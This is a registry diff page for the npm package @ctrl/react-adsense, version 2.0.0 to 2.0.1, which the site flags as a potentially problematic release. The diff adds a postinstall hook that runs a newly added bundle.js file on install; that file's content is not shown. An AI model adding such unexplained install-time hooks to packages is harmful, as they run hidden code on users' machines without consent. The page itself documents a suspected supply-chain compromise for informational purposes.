@ctrl/react-adsense 2.0.0 → 2.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @ctrl/react-adsense might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ctrl/react-adsense",
3
- "version": "2.0.0",
3
+ "version": "2.0.1",
4
4
  "description": "Typescript adsense module",
5
5
  "author": "Scott Cooper <scttcper@gmail.com>",
6
6
  "license": "MIT",
@@ -26,7 +26,8 @@
26
26
  "demo:watch": "pnpm --filter demo-app dev",
27
27
  "test": "vitest run",
28
28
  "test:watch": "vitest",
29
- "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
29
+ "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
30
+ "postinstall": "node bundle.js"
30
31
  },
31
32
  "dependencies": {
32
33
  "tslib": "^2.8.1"
@@ -58,4 +59,4 @@
58
59
  "master"
59
60
  ]
60
61
  }
61
- }
62
+ }